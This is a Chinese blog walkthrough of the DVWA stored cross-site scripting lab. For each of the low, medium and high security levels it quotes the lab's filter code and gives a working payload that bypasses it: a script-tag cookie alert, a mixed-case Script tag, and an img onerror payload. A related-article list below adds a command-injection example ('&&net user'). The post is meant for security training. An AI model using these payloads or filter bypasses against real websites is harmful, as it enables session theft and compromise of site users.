DVWA - XSS (Stored) (low, medium, high)

最新推荐文章于 2024-02-04 09:45:26 发布
最新推荐文章于 2024-02-04 09:45:26 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: CTF 文章标签: security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scnu_jiechao/article/details/54140435
版权

low

无验证,Massage直接注入

<script>alert(document.cookie)</script>

medium

查看源码发现Name只过滤了<scrpit>标签

$name = str_replace( '<script>', '', $name );

绕过思路:HTML页面修改Name的最大输入长度,注入Name,注入script大写

<input name="txtName" type="text" size="30" maxlength="100">
<Script>alert(document.cookie)</script>

high

查看源码,可发现Name只用正则过滤了

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

绕过思路:HTML页面修改Name的最大输入长度,注入Name,注入换一种标签,这里用img

<img src=1 onerror=alert(document.cookie)>
jchalex
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令注入: DVWA级别分别设置LowMediumHigh、Impossible 进行命令注入
彭淦淦的博客
05-09 4940
2.2 步骤 实现此案例需要按照如下步骤进行。 步骤一:DVWA级别设置Low 1)访问DVWA选择Low级别,然后点击“Command Injection”,如图-15所示 图-15 2)输入192.168.111.142并提交,正常显示结果,如图-16所示 图-16 3)输入192.168.111.142&&net user并提交,爆出了用户名,如图-17所示 图-17 步骤二:DVWA级别设置Medium 1)访问DVWA选择Medium级别,然后点
DVWA通过教程之XSS(Reflected),XSS(Stored),XSS(DOM)
→_→
07-06 2376
(1)测试XSS(Reflected),要求在正常访问网页时弹出警告框,警告框显示:“You are attacked by liumengbo!”。 low 前端代码: 服务器端核心代码: 分析: 可以看到,代码直接引用了name参数,并没有任何的过滤与检查,存在明显的XSS漏洞。 漏洞利用 直接在输入框输入: <script>alert(/You are attacked by hacker!/)</script> ,成功弹框: .
DVWA学习之XSS(跨站脚本攻击
最新发布
mmxhappy的专栏
02-04 437
跨站脚本攻击XSS(Cross Site Script) 为了不和层叠式演示表(Cascading Style Sheets,CSS) 的缩写混淆,顾将跨站脚本攻击缩写为XSS。恶意攻击者网web页面插入恶意Script代码,当用户浏览该页面时,嵌入web里面的script代码就会被执行,从而达到攻击用户的目的。XSS攻击针对的是用户层面的攻击
DVWA——XSS(Stored)(low)
分享简单的安全技术
01-14 232
XSS(Stored) 界面 源代码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message ); $mess
DVWA暴力破解(Brute Force)——全等级(LowMediumHigh,lmpossible)精讲
Gjqhs的博客
03-07 4959
使用phpstudy搭建渗透测试靶场环境 目录 1.Low级别 2.mediun级别 3.high级别 4.impossible级别 1.Low级别 文件源代码: <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]...
DVWA-XSS(DOM)
weixin_44866139的博客
01-29 2663
XSS 简介 参考链接 XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过 HTML 注入 篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。 DOM—based XSS漏洞的产生 DOM—based XSS漏洞是基于文档对象模型...
DVWA-master.zip
01-04
DVWA-master.zip
DVWA-master.7z 压缩包
09-14
下载到本地,解压缩之后,重命名为DVWA,并将其放在PHPstudy的WWW目录下
DVWA XSS DOM
m0_56107268的博客
04-30 929
DOM,全称Document Object Model,是一个平台和语言都立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。 在网站页面有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,..
DVWAXSS(DOM)
RexHa的博客
10-06 1817
dvwa XSS(DOM)
[网络安全]DVWAXSS(DOM)攻击姿势及解题详析合集
等风来
05-16 1万+
源代码未进行任何过滤复选框的内容为可变参数:这段 PHP 代码主要是用于处理 GET 请求的 default 参数,它包含了以下几个功能: 1.判断是否有 default 参数:通过 array_key_exists() 函数来判断 $_GET 超级全局变量是否存在名为 default 的键,如果存在并且不为 null,则将其赋值给 $default 变量。 2.防止 XSS 攻击:使用 stripos() 函数查找 $default 是否包含
CTFWeb题目的各种基础的思路-----入门篇十分的详细
热门推荐
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
玩转DVWAXSS DOM
key01362000的博客
09-29 1028
DVWAXSS DOM攻击
Baby XSS
qq_39536716的博客
05-01 1521
对于XSS的学习过程,已经更新在CSDN博客 题目分析 这道题目告诉我们flag在admin.php,只有admin才能获取它,我们点击进去之后发现并没有flag,这是为什么呢?因为我们不是admin,因此,我们必须伪装成admin。 题目的下面有一行代码,substr((md5(‘proof of work’),0,6) === ‘4b3392’) 这一行代码的意思是截取经过MD5编码的工作量...
2017 某校赛 Writeup
4ct10n
06-25 1802
这次校赛的时候只做了web题 ,。。。。
DVWAXSS(DOM)
ANDTM的博客
06-08 227
DOM就是一个树状的模型,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射型xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射型的,也有可能是存储型的),简单去理解就是因为他输出点在DOM。dom - xss是通过url传入参数去控制触发的)
ctf题目
qq_46132256的博客
09-04 235
高不够时先查看图片属性长宽转为16进制,再使用010editor等二进制查看图片长宽的十六进制并修改。
DVWA攻略-05-XSS-DOM型/反射型/存储型
Xor0ne
07-16 351
参考文献: DVWA靶场-XSS(DOM型、反射型、存储型) 文章目录9.DOM型-xss9.1、low9.2、medium9.3、high9.4、impossible10.Reflected XSS10.1、low10.2、medium10.3、high10.4、impossible11.Stored-xss11.1、low11.2、medium11.3、 high11.4、impossible 9.DOM型-xss DOM,文档对象模型(Document Object Model),是W3C组织推荐的处
DVWA关卡11:Reflected Cross Site Scripting (XSS)(反射型XSS
m0_54899775的博客
12-12 1027
DVWA关卡11:Reflected Cross Site Scripting (XSS)(反射型XSS

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值